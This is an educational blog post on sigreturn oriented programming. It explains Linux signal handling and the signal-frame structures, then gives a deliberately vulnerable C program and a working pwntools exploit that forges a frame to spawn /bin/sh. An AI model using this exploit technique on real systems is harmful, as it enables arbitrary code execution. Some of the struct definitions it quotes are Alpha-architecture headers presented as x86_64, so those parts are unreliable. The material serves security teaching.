Sigreturn Oriented Programming

Throughout the years, there have been a multitude of techniques which arose to take advantage of and exploit various mechanisms present within software. One such technique takes advantage of the signal handling routine of Unix based operating systems to gain arbitrary code execution.

Within this post, I will be covering the technique known as sigreturn oriented programming, as well as various properties it possesses which allows us to construct a weird machine. I will elaborate on this term, as well as the technique at a later point within this post, but first we need to gain a fundamental understanding of what signals are and their implementation within Unix based systems.

Signal Handling

So what are signals, how do they work and what purpose do they serve?

We can consider signals as a mechanism for interprocess communication for the various events or requests. It is a software interrupt which is asynchronously delivered to a process to indicate a specific event.

An important distinction to take note of are the limitations of signals as opposed to other forms of IPC. We can think of each signal as a flag of sorts to indicate an event or behavior. We can also implement our own signal handler programatically which allows us to execute our own callbacks.

The following is a list of the signals supported by the Posix Standard, as well as a brief description of their functionality. Its not important to know each of these, but its good to keep a reference in the scenario that one of these signals are encountered. This section is from the man page of signal(7).

Manual page signal(7)

Signal      Standard   Action   Comment
────────────────────────────────────────────────────────────────────────
SIGABRT      P1990      Core    Abort signal from abort(3)
SIGALRM      P1990      Term    Timer signal from alarm(2)
SIGBUS       P2001      Core    Bus error (bad memory access)
SIGCHLD      P1990      Ign     Child stopped or terminated
SIGCLD         -        Ign     A synonym for SIGCHLD
SIGCONT      P1990      Cont    Continue if stopped
SIGEMT         -        Term    Emulator trap
SIGFPE       P1990      Core    Floating-point exception
SIGHUP       P1990      Term    Hangup detected on controlling terminal
                               or death of controlling process
SIGILL       P1990      Core    Illegal Instruction
SIGINFO        -                A synonym for SIGPWR
SIGINT       P1990      Term    Interrupt from keyboard
SIGIO          -        Term    I/O now possible (4.2BSD)
SIGIOT         -        Core    IOT trap. A synonym for SIGABRT
SIGKILL      P1990      Term    Kill signal
SIGLOST        -        Term    File lock lost (unused)
SIGPIPE      P1990      Term    Broken pipe: write to pipe with no
                               readers; see pipe(7)
SIGPOLL      P2001      Term    Pollable event (Sys V);
                               synonym for SIGIO
SIGPROF      P2001      Term    Profiling timer expired
SIGPWR         -        Term    Power failure (System V)
SIGQUIT      P1990      Core    Quit from keyboard
SIGSEGV      P1990      Core    Invalid memory reference
SIGSTKFLT      -        Term    Stack fault on coprocessor (unused)
SIGSTOP      P1990      Stop    Stop process
SIGTSTP      P1990      Stop    Stop typed at terminal
SIGSYS       P2001      Core    Bad system call (SVr4);
                               see also seccomp(2)
SIGTERM      P1990      Term    Termination signal
SIGTRAP      P2001      Core    Trace/breakpoint trap
SIGTTIN      P1990      Stop    Terminal input for background process
SIGTTOU      P1990      Stop    Terminal output for background process
SIGUNUSED      -        Core    Synonymous with SIGSYS
SIGURG       P2001      Ign     Urgent condition on socket (4.2BSD)
SIGUSR1      P1990      Term    User-defined signal 1
SIGUSR2      P1990      Term    User-defined signal 2
SIGVTALRM    P2001      Term    Virtual alarm clock (4.2BSD)
SIGXCPU      P2001      Core    CPU time limit exceeded (4.2BSD);
                               see setrlimit(2)
SIGXFSZ      P2001      Core    File size limit exceeded (4.2BSD);
                               see setrlimit(2)
SIGWINCH       -        Ign     Window resize signal (4.3BSD, Sun)

When we want to send a signal to a process, we utilize the system call kill.

As not all signals are meant to signify the termination of a process, the naming convention for the system call can be a bit confusing. The reasoning behind this is the fact that the kill system call was initially introduced during early development of Unix, at which time the purpose of signals were primarily to kill processes.

Over time various other signals were implemented into Unix, so the name is retained for backwards compatability with earlier versions of Unix.

When the kernel delivers a signal, it must first perform a (signal) context-switch before it can execute the signal handler (this is not to be confused with the context-switch from user to kernel space due to the system call). The kernel will store the current state and context of the process and write it to the stack in the form of a runtime signal frame structure. We will explore this structure later on due to its relevance in the exploitation of the signal handling mechanism.

However, if the signal handler resides within user space, why is there a need for a context switch?

This is due to the fact that signals are an asynchronous operation, meaning that we cant simply execute a signal handler like we would any other subroutine. Signals need to be handled at the point in time that they are delivered.

Once this frame has stored the context of the execution for the running process on the stack, the process then executes the signal handler. If control returns back from the handler to the process, the function sigreturn will be called and the the context of the process is restored and continues exection.

A more detailed sequence of events is depicted as follows.

Send a signal to a process via kill system call, interrupts or some other form of interprocess communication.
Kernel initially handles the request for a signal to be delivered to a process by calling do_signal. This function is responsible for handling the initial processing of the signal as well as validating permissions and validity of the signal.
Then the kernel will call the function handle_signal, which determines how the signal should be handled. If there has been a custom signal handler implemented programatically by the developer, it will then prepare the call this handler. Else it will execute its default operation and terminate the process.
In the scenario in which there is a signal handler implemented, setup_frame will be called. This function saves the current execution context of the process on the stack.
After this, the kernel will transfer control flow over to the signal handler. An important thing to keep in mind is the fact that the execution of the signal handler is done within the same process environment. We cannot execute user land code in the kernel due to SMAP/SMEP; it would not make sense to either.

Once the signal handler has finished executing, we need some mechanism which restores the previous execution context and resumes the running process. The following is a high level sequence of events which allows for this.

When a signal handler is finished executing, the system call sigreturn will be invoked.
A context switch is performed from user space into kernel space due to the system call. The kernel is now responsible for restoring the previous execution context stored on the user space stack.
Once the process state is restored, the kernel transfers control back to the process and resumes execution.

Signal Frame Structure

Let’s take a closer look into the exact structures involved with signal handling, more specifically, struct rt_sigframe. This is the structure which contains the current execution context of the running process. The runtime signal frame is stored on the user land stack; which allows for malicious crafted input to forge a frame if they have enough control over the stack.

The following is the definition of the runtime signal frame structure. Keep in mind that the structure is heavily architecture dependent. I will only be covering the structure for modern x86_64 linux systems.

https://elixir.bootlin.com/linux/latest/source/arch/x86/include/asm/sigframe.h#L57

struct rt_sigframe {
	char __user *pretcode;
	struct ucontext uc;
	struct siginfo info;
	/* fp state follows here */
};

The first field for this structure is char __user *pretcode, which essentially holds the return address for the signal handler. Once the handler has finished executing, it will jump to the address present in this field. Keep in mind that the __user macro denotes an address in user space.

If we view the value at runtime, we can see that it is populated with the address of the symbol __restore_rt. The following is the disassembly of the function within libc.

pwndbg> x/2i 0x00007ffff7de6ab0
   0x7ffff7de6ab0 <__restore_rt>:       mov    rax,0xf
   0x7ffff7de6ab7 <__restore_rt+7>:     syscall
pwndbg>

The code stub simply invokes the sigreturn system call. When the signal handler returns, it will execute sigreturn to restore and resume execution context for the running process. As previously explained, sigreturn will be responsible for this operation.

The next field struct ucontext uc expands into the following structure.

https://elixir.bootlin.com/linux/latest/source/arch/alpha/include/asm/ucontext.h#L5

#ifndef _ASMAXP_UCONTEXT_H
#define _ASMAXP_UCONTEXT_H

struct ucontext {
	unsigned long	  uc_flags;
	struct ucontext  *uc_link;
	old_sigset_t	  uc_osf_sigmask;
	stack_t		  uc_stack;
	struct sigcontext uc_mcontext;
	sigset_t	  uc_sigmask;	/* mask last for extensibility */
};

#endif /* !_ASMAXP_UCONTEXT_H */

This structure stores the user context for the running process. The following is a brief description for each of the structure fields.

struct ucontext
- uc_flags: stores flags which indicate the current status of the execution context.
- uc_link: pointer to an execution context which should be resumed when the current context completes, used for context switching and thread scheduling.
- uc_osf_sigmask: this field stores the process signal mask. the collection of signals which are currently blocked is known as the signal mask.
- uc_stack: the stack used by the current signal context.
- uc_mcontext: this structure contains a machine architecture specific snapshot of the execution context.
- uc_sigmask: contains the signal mask within the context, same as the uc_osf_sigmask field.

Let’s take a look at this structure at runtime and examine each of it’s fields.

pwndbg> p *(struct ucontext_t*) 0x7fffffffd680
$10 = {
  uc_flags = 7,
  uc_link = 0x0,
  uc_stack = {
    ss_sp = 0x0,
    ss_flags = 2,
    ss_size = 0
  },
  uc_mcontext = {
    gregs = {140737488346224, 140737353936240, 8, 514, 0,
      140737488346712, 140737354125312, 93824992247256, 2,
      140737488345728, 140737488346416, 140737488346696, 0, 0,
      140737351936899, 140737488346400, 93824992235913, 518,
      12103423998558259, 0, 3, 0, 0},
    fpregs = 0x7fffffffd840,
    __reserved1 = {3, 140733193388032, 140737488345096,140737488345092,
      0, 0, 140737353919659, 4160530904}
  },
  uc_sigmask = {
    __val = {0, 140737488345304, 93824992232647, 140737354131016,
      140737353708968, 140737354130112,
      466005475, 140737488345344, 140737353958056, 1, 140737353708968,
      1, 0, 1, 140737354130112, 140737354131016}
  },
  __fpregs_mem = {
    cwd = 55416,
    swd = 65535,
    ftw = 32767,
    fop = 0,
    rip = 140733193388033,
    rdp = 140737488345216,
    mxcsr = 895,
    mxcr_mask = 0,
    _st = {{
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {8064, 0, 65535, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }},
    _xmm = {{
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {896, 896, 896, 896}
      }, {
        element = {896, 896, 896, 896}
      }, {
        element = {896, 896, 896, 896}
      }, {
        element = {896, 896, 896, 896}
      }, {
        element = {2, 0, 14, 2147483648}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }},
    __glibc_reserved1 = {0, 0, 0, 0, 0, 0,
      4294957584, 32767, 4160572646, 32767, 4158322872, 32767,
      4160694051, 32767, 4160319488, 32767, 110527148, 0, 1179670611,
      1092, 31, 0, 1088, 0}
  },
  __ssp = {0, 0, 0, 3}
}

The primary portion of the user context structure is held within the field struct sigcontext uc_mcontext. This structure holds the registers and execution state of the saved execution state. What follows is the definition of the structure.

https://elixir.bootlin.com/linux/latest/source/arch/alpha/include/uapi/asm/sigcontext.h#L5

#ifndef _ASMAXP_SIGCONTEXT_H
#define _ASMAXP_SIGCONTEXT_H

struct sigcontext {
	/*
	 * What should we have here? I'd probably better use the same
	 * stack layout as OSF/1, just in case we ever want to try
	 * running their binaries.. 
	 *
	 * This is the basic layout, but I don't know if we'll ever
	 * actually fill in all the values..
	 */
	 long		sc_onstack;
	 long		sc_mask;
	 long		sc_pc;
	 long		sc_ps;
	 long		sc_regs[32];
	 long		sc_ownedfp;
	 long		sc_fpregs[32];
	 unsigned long	sc_fpcr;
	 unsigned long	sc_fp_control;
	 unsigned long	sc_reserved1, sc_reserved2;
	 unsigned long	sc_ssize;
	 char *		sc_sbase;
	 unsigned long	sc_traparg_a0;
	 unsigned long	sc_traparg_a1;
	 unsigned long	sc_traparg_a2;
	 unsigned long	sc_fp_trap_pc;
	 unsigned long	sc_fp_trigger_sum;
	 unsigned long	sc_fp_trigger_inst;
};


#endif

Keep in mind that the implementation of this structure (as well as various others) will differ from platform and architecture to meet specific requirements.

Let’s take a look at this structure at runtime to view the specific contents of each saved register.

pwndbg> p*(struct sigcontext *)(*(struct ucontext_t*)0x7fffffffd680).uc_mcontext
$9 = {
  r8 = 0,
  r9 = 0,
  r10 = 3849470367813,
  r11 = 3848290698112,
  r12 = 3848290698112,
  r13 = 3848290698112,
  r14 = 3848290698112,
  r15 = 3848290698112,
  rdi = 3848290698112,
  rsi = 3848290698112,
  rbp = 2,
  rbx = 9223372036854775822,
  rdx = 0,
  rax = 0,
  rcx = 0,
  rsp = 0,
  rip = 0,
  eflags = 0,
  cs = 0,
  gs = 0,
  fs = 0,
  __pad0 = 0,
  err = 3216465788709089792,
  trapno = 1,
  oldmask = 93824992235913,
  cr2 = 140737488346696,
  {
    fpstate = 0x1f7ffdab0,
    __fpstate_word = 8455707312
  },
  __reserved1 = {1, 140737351845968, 140737488346672,
    93824992235878, 5726617664, 140737488346696,
    140737488346696, 10445461255472785543}
}
pwndbg>

Now let’s view the last field present within the runtime signal frame struct siginfo info. This field holds various information about the signal which was delivered to the process. The following is the expanded definition of the structure.

typedef struct siginfo {
  union {
    struct {
      int si_signo;
      int si_errno;
      int si_code;
      union __sifields _sifields;
    }
    int _si_pad[SI_MAX_SIZE/sizeof(int)];
  };
} __attribute__((aligned(8))) siginfo_t;

The first field si_signo holds the signal number or type which the signal represents. The next field si_errno may potentially hold an error code if the signal was generated due to an error condition. The field si_code provides additional information about the specific event which triggered the signal. The usage of this field depends on the type of signal.

The field _sifields is a union which typically contains various information on the sender’s process and user identifier. I will not be elaborating nor expanding on this structure as its not relevant.

Sigreturn Oriented Programming

The technique known as srop exploits the signal handling mechanism due to the fact that the execution context is stored on the user space stack; and there is no means of verifying whether a runtime signal frame is legitimate.

Thanks to this, an attacker can with enough control over the stack can forge a malicious runtime signal frame for the kernel to load. There are a few means of achieving this technique, but we need the ability to invoke the sigreturn system call. We can do this via several means.

One such method is via return oriented programming. If there is a syscall rop gadget present within the binary and we can control the ax register, we can leverage it to invoke sigreturn.

On older versions of linux, there also exists a sigreturn gadget which is present at a fixed kernel page. This was mapped into user space processes in the form of vDSO as an optimization for system calls. This virtual system call mechanism has been deprecated in newer versions of linux.

Using this technique, we can leverage the signal handling routine to populate each and every register with whatever value we want. The following is a vulnerable program in which we will exploit using srop.

// gcc -w -static -no-pie -fno-stack-protector -o vuln vuln.c
#include <stdio.h>
#include <unistd.h>

int foo(char* buffer) {
  return read(0, buffer, 1024);
}

int main(int argc, char** argv) {
  char buffer[128];
  printf("Bytes read into buffer: %d\n", foo((char *)&buffer));
  puts("Good luck on calling /bin/sh");
  return 0;
}

For the sake of simplicity, we will compile the binary statically and without position independent code (PIE). This allows us to use the __restore_rt gadget to call sigreturn, which would typically be held within libc; as well as access to the string /bin/sh. It makes the example much easier to comprehend and work with as we wont have to worry about gaining leaks and calculating offsets.

We will also disable the stack canary as we need to be able to write over the stack to forge our fake runtime signal frame. Keep in mind that we dont actually need to send a signal, we can just craft a fake frame then invoke sigreturn to restore the current execution context with our fake signal frame.

The last little cheat that the program provides us is the /bin/sh\x00 string. As this string is no longer present in recent versions of statically compiled binaries, simply using a string within .rodata would be much easier than having to write our own to a known writeable region of memory.

What follows is the high level sequence of events taken to gain a shell on the binary.

Calculate the offset of the return address of the binary.
Find the address of important addresses of memory, specifically the /bin/sh string, the address of the restore_rt symbol for our return address and the address of a syscall gadget for instruction pointer.
Craft a fake signal frame which populates the registers with the appropriate arguments to spawn a shell with execve.
Craft final payload with padding and forged runtime signal frame.

First and foremost, lets calculate the offset of the return address.

─────────────────────────────[ BACKTRACE ]─────────────────────────────
 ► f 0         0x401838 main+79
   f 1 0x6161616161616172
   f 2 0x6161616161616173
   f 3 0x6161616161616174
   f 4 0x6161616161616175
   f 5 0x6161616161616176
   f 6 0x6161616161616177
   f 7 0x6161616161616178
───────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l raaaaaaa
Finding cyclic pattern of 8 bytes: b'raaaaaaa' (hex: 0x7261616161616161)
Found at offset 136
pwndbg>

So now we know that the offset is at 136 bytes, the return address should be directly after this. From here, we need some means of invoking the sigreturn system call. Thankfully we have the __restore_rt symbol statically linked within the binary itself so we can use that as our gadget. Keep in mind, the first field of the signal frame pretcode effectively serves as the return address.

From here we can populate the values of the signal frame with whatever values we want. In this case, we can to call execve("/bin/sh", 0, 0). Once our registers are populated with the correct values, we now need to invoke a system call via a syscall gadget to execute execve.

When forging a fake signal frame, we need to be careful not to populate various fields with bad values which may potentially corrupt the runtime of our process. There are a few requirements which we need in order to forge a valid frame, they are as follows.

The code segment (CS) register must be correctly restored, on x86_64 this register contains the value 0x33.
The fpstate field should not point to a random pointer and should be null. When this field is null, Linux will assume no floating point operations and will clear the FPU state.

The rest of the fields that were not mentioned were populated with the values shown at runtime by the debugger.

The full exploit code is shown below.

#!/usr/bin/env python3
from pwn import *

p = ELF('vuln', checksec=0).process(env={})

bin_sh = 0x00475020+21
restore_rt = 0x00462170
syscall = 0x00000000004011b8

sigframe = p64(restore_rt) # pretcode (return address)
sigframe += p64(0x0000000000000007) # uc_flags
sigframe += p64(0) # uc_link
sigframe += p64(0) # uc_stack.ss_sp
sigframe += p64(0x0000ffff00000000) # uc_stack.ss_flags
sigframe += p64(0) # uc_stack.ss_size
sigframe += p64(0)*8 # r8-r15
sigframe += p64(bin_sh) # rdi
sigframe += p64(0) # rsi
sigframe += p64(0) # rbp
sigframe += p64(0) # rbx
sigframe += p64(0) # rdx
sigframe += p64(59) # rax
sigframe += p64(0) # rcx
sigframe += p64(0) # rsp
sigframe += p64(syscall) # rip
sigframe += p64(0x0000000000000202) # eflags
sigframe += p64(0x002b000000000033) # ss, fs, gs, cs
sigframe += p64(0) # err
sigframe += p64(1) # trapno
sigframe += p64(0)*3
sigframe += p64(0xe) # reserved
sigframe += p64(0) # uc_sigmask

offset=136
payload = b'A'*offset
payload += sigframe

pause()
p.send(payload)
p.interactive()

Conclusion

In summary, sigreturn oriented programming is a technique typically used to populate registers for the goal of arbitrary code execution by forging a runtime signal frame and exploiting the signal handling mechanism on Unix based systems.

Below is a list of additional resources which I used as a reference while writing this post, I highly recommend going through the original paper on this technique.

Thanks for reading!

Additional Resources

https://www.cs.vu.nl/~herbertb/papers/srop_sp14.pdf
https://tc.gtisc.gatech.edu/bss/2014/r/srop-slides.pdf
https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
https://lwn.net/Articles/676803/